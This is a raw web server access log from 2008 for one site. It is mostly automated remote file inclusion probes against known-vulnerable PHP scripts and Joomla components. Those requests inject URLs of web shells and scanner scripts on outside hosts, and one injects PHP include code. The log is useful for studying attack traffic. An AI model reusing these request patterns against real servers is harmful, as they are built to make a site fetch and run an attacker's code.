195.12.53.176 - - [16/Nov/2008:19:52:10 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:19:52:10 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:52:42 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
201.30.20.130 - - [16/Nov/2008:19:54:00 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.albalactanciamaterna.info//modules/Forums/admin/id2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:19:54:54 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.redneckmba.com"
195.12.53.176 - - [16/Nov/2008:19:55:06 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:57:21 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:57:21 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:57:21 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
65.55.210.91 - - [16/Nov/2008:19:58:12 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
65.55.210.91 - - [16/Nov/2008:19:58:13 -0800] "GET /logs/access_081110.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:20:00:37 -0800] "GET /logs/access.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.89.31.108 - - [16/Nov/2008:20:00:37 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.89.31.108 - - [16/Nov/2008:20:00:37 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:00:55 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:00:55 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
85.93.165.132 - - [16/Nov/2008:20:01:15 -0800] "GET /logs/access.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
85.93.165.132 - - [16/Nov/2008:20:01:16 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
85.93.165.132 - - [16/Nov/2008:20:01:16 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
38.98.60.188 - - [16/Nov/2008:20:01:24 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
38.98.60.188 - - [16/Nov/2008:20:01:25 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:01:57 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:01:57 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:02:00 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:02:01 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:02:01 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:02:02 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:02:22 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:02:22 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:20:04:03 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:20:04:03 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:04:30 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:04:30 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:04:30 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
69.89.31.108 - - [16/Nov/2008:20:04:41 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
200.201.48.198 - - [16/Nov/2008:20:05:15 -0800] "GET /logs/access.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
200.201.48.198 - - [16/Nov/2008:20:05:15 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
200.201.48.198 - - [16/Nov/2008:20:05:15 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:20:05:32 -0800] "GET /errors.php?error=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.redneckmba.com"
203.146.251.182 - - [16/Nov/2008:20:07:59 -0800] "GET /logs/access.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://odj.or.id/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
203.146.251.182 - - [16/Nov/2008:20:07:59 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://odj.or.id/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
200.201.48.198 - - [16/Nov/2008:20:10:31 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:11:20 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:11:20 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:11:20 -0800] "GET /logs/access.log/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.redneckmba.com"
85.93.165.132 - - [16/Nov/2008:20:11:25 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
69.64.70.75 - - [16/Nov/2008:20:11:44 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.redneckmba.com"
69.64.70.75 - - [16/Nov/2008:20:11:45 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:12:14 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:12:14 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:12:14 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
203.146.251.182 - - [16/Nov/2008:20:13:08 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
76.13.123.194 - - [16/Nov/2008:20:14:03 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:15:08 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
211.234.119.27 - - [16/Nov/2008:20:15:10 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://turulato.cursosyformacion.com/.../www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
211.234.119.27 - - [16/Nov/2008:20:15:10 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://turulato.cursosyformacion.com/.../www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.106 - - [16/Nov/2008:20:15:19 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:16:40 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:16:40 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:16:40 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:17:13 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:17:15 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
72.30.79.93 - - [16/Nov/2008:20:18:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
72.30.79.93 - - [16/Nov/2008:20:18:20 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
203.114.112.155 - - [16/Nov/2008:20:18:56 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.114.112.155 - - [16/Nov/2008:20:18:58 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
80.93.59.63 - - [16/Nov/2008:20:22:09 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
80.93.59.63 - - [16/Nov/2008:20:22:09 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
80.93.59.63 - - [16/Nov/2008:20:22:09 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:22:15 -0800] "GET /logs/access.log/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:22:15 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:22:15 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:23:33 -0800] "GET /logs/access.log/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:23:36 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:23:36 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:23:38 -0800] "GET /logs/access.log/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:23:38 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:23:38 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idr.txt?? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
121.78.225.23 - - [16/Nov/2008:20:24:26 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "redneckmba.com"
121.78.225.23 - - [16/Nov/2008:20:24:30 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "redneckmba.com"
121.78.225.23 - - [16/Nov/2008:20:24:31 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:25:21 -0800] "GET /logs/access.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:25:21 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:25:35 -0800] "GET /logs/access.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:25:35 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:25:39 -0800] "GET /logs/access.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
69.5.81.37 - - [16/Nov/2008:20:25:39 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "redneckmba.com"
80.93.59.63 - - [16/Nov/2008:20:26:35 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [16/Nov/2008:20:26:41 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
121.78.225.23 - - [16/Nov/2008:20:26:56 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.redneckmba.com"
91.33.111.196 - - [16/Nov/2008:20:29:41 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/Seninle1d/c99.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
212.122.161.247 - - [16/Nov/2008:20:29:43 -0800] "GET /logs/access_080825.log/?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
212.122.161.247 - - [16/Nov/2008:20:29:43 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
212.122.161.247 - - [16/Nov/2008:20:29:43 -0800] "GET /?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
91.33.111.196 - - [16/Nov/2008:20:29:43 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/Seninle1d/c99.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
91.33.111.196 - - [16/Nov/2008:20:29:43 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/Seninle1d/c99.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
212.122.161.247 - - [16/Nov/2008:20:29:52 -0800] "GET /logs/access_080929.log/?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
91.33.111.196 - - [16/Nov/2008:20:32:02 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/Seninle1d/c99.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
91.33.111.196 - - [16/Nov/2008:20:32:02 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/Seninle1d/c99.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:20:32:54 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
207.57.2.157 - - [16/Nov/2008:20:35:21 -0800] "GET /logs/access.log/index.php?body=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
207.57.2.157 - - [16/Nov/2008:20:35:21 -0800] "GET /index.php?body=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
207.57.2.157 - - [16/Nov/2008:20:35:22 -0800] "GET /logs/index.php?body=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
80.93.59.63 - - [16/Nov/2008:20:36:50 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
70.38.54.118 - - [16/Nov/2008:20:37:50 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "redneckmba.com"
70.38.54.118 - - [16/Nov/2008:20:37:50 -0800] "GET /admin/sidebar.php?db=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "redneckmba.com"
70.38.54.118 - - [16/Nov/2008:20:37:50 -0800] "GET /logs/admin/sidebar.php?db=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:20:38:13 -0800] "GET /admin/sidebar.php?db=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:20:38:13 -0800] "GET /logs/admin/sidebar.php?db=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:20:38:13 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
212.122.161.247 - - [16/Nov/2008:20:38:50 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
72.29.68.244 - - [16/Nov/2008:20:39:05 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
72.29.68.244 - - [16/Nov/2008:20:39:05 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
213.193.229.232 - - [16/Nov/2008:20:41:34 -0800] "GET /?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_chronocontact/excelwriter/Writer/poiid.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.193.229.232 - - [16/Nov/2008:20:41:34 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.asa.ba/eng/administrator/components/com_chronocontact/excelwriter/Writer/poiid.txt???? HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
